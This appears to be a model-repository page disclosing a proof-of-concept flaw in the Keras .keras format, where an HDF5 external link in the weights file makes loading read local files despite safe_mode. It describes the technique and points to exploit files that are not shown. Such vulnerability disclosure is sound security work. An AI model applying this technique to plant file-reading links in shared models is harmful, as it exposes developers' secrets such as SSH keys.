You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

This repo is a proof of concept for a vulnerability I found in how the modern .keras format handles weights. Even if you use safe_mode=True, the model loader still messes up by letting the HDF5 driver resolve external links. This means a malicious model can "point" to files on your local system (like /etc/hostname) and read them into the model session.

Setup

The exploit_model.keras file is actually a zip. Inside, the model.weights.h5 has been modified to include an HDF5 external link. When Keras loads the weights, it follows that link to the host's local files. It bypasses the Python-level safety checks because the "leak" happens deeper down in the H5 library.

Procedure

  1. Grab the code3,py file from this repo.
  2. After that run the tcn2.py or similar trigger adjusted to your setup / testcase from this same repo

Impact

This is a pretty big deal for supply-chain security. If a dev downloads a "pre-trained" model, that model could theoretically peek at their env vars, config files, or SSH keys just by being initialized. It totally breaks the trust people have in the new .keras format.

Check the exploit_model.keras file

image

image

Downloads last month
-
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support